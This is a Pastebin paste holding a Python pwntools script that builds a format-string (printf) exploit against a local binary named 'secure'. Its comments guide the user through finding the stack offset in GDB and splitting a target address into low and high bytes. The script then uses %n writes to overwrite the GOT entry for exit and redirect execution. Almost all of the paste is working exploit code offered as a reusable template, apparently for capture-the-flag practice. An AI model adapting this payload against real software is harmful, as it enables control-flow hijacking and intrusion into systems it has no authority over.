daily pastebin goal
14%
SHARE
TWEET

Format String/printf Vulnerability

RootOfTheNull Aug 14th, 2018 133 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. '''
  4. John Hammond
  5. FULL DISCLAIMER:
  6.  This aims to be a general purpose script... but you will need to modify it
  7.  as you work with exploring the problem you are on. There are a couple steps of
  8.  manual testing, and I try to explain these in the comments below.
  9. '''
  10.  
  11.  
  12. from pwn import *
  13.  
  14. context.log_level = 'critical'
  15.  
  16. elf = ELF('./secure')
  17.  
  18. # These are the addresses in memory that you want to overwrite. YOU WILL NEED TO CHANGE THESE
  19. # You can find these with pwntools (elf.got['<function_name>']) or `readelf -s <binary_name>`
  20. overwite = elf.got['exit'] # this is the value that you want to OVERWRITE...
  21. to_write = 0x08048713 # this is the value that you want TO OVERWRITE IT WITH...
  22.  
  23.  
  24.  
  25. # For initial testing, you will first need to discover MANUALLY..:
  26. ### This is the size of the buffer that you can write into. We use this for padding.
  27. # (You can find this with Hopper or IDA if you don't have source code given).
  28. length_of_buffer = 64
  29. ### This is the offset of our buffer on the stack. (the position of AAAA for testing)
  30. offset = 35
  31.  
  32. ### These values come from testing in GDB.... YOU WILL NEED TO DO THIS MANUALLY
  33. testing_value = 30  # use this when replacing
  34.  
  35. first_difference = 0x2e # this is the value you see replacing the GOT entry after FIRST test
  36.                         # (the LAST FOUR BYTES hex, the LOW BYTES)
  37. first_difference -= testing_value    # NO NEED TO CHANGE THIS LINE
  38. second_difference = 0x8731 # this is the value you see the SECOND time you test.
  39.                            # (the first FOUR BYTES, the HIGH BYTES
  40. second_difference -= testing_value # NO NEED TO CHANGE THIS LINE
  41.  
  42.  
  43. # --------------------------------------------------------------------------------------------
  44.  
  45. # These variables help do the math for you. DO NOT CHANGE THESE VARIABLES
  46. LOW_BYTES = str(hex(to_write)[-4:])
  47. LOW_BYTES_DIFFERENCE = int(LOW_BYTES,16) - first_difference
  48. HIGH_BYTES = '1'+hex(to_write)[2:-4].zfill(4)
  49. HIGH_BYTES_DIFFERENCE = int(HIGH_BYTES, 16) - second_difference
  50.  
  51. # Convenience function for padding, no need to change
  52. def pad(s): return s + "X" * ( length_of_buffer - len(s) )
  53.  
  54.  
  55. #### You will have to tweak this to test in GDB.
  56. exploit = ""
  57. exploit += p32(overwite)                   # this will be filled with the LOW BYTES DIFFERENCE...
  58. exploit += p32(overwite+1)                 # this fills HIGH BYTES (+1 for next pos. on stack)...
  59. exploit += 'AAAABBBB'                      #
  60. # exploit += '$<#change_to_test_offset>$x' ### USED FOR TESTING OFFSET... NOT NEEDED FOR PAYLOAD
  61.  
  62. # exploit += '%'+str(offset)+'$'+str(testing_value)+'x'         ### USED FOR FIRST TEST...
  63.                                                                 ### (COMMENT OUT THE 2ND TEST BELOW!!)
  64. exploit += '%'+str(offset)+'$'+str(LOW_BYTES_DIFFERENCE)+'x'    # use this line for payload
  65.                                                                 # when variable above are filled
  66. exploit += '%'+str(offset)+'$n' # used to write the value!
  67.  
  68. # exploit += '%'+str(offset+1)+'$'+str(testing_value)+'x'       ### USED FOR SECOND TEST...
  69.                                                                 ### (KEEP THE FIRST TEST ABOVE)
  70. exploit += '%'+str(offset+1)+'$'+str(HIGH_BYTES_DIFFERENCE)+'x'
  71.                                                                 # when variable above are filled
  72. exploit += '%'+str(offset+1)+'$n' # used to write the value!
  73.  
  74.  
  75. print exploit
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top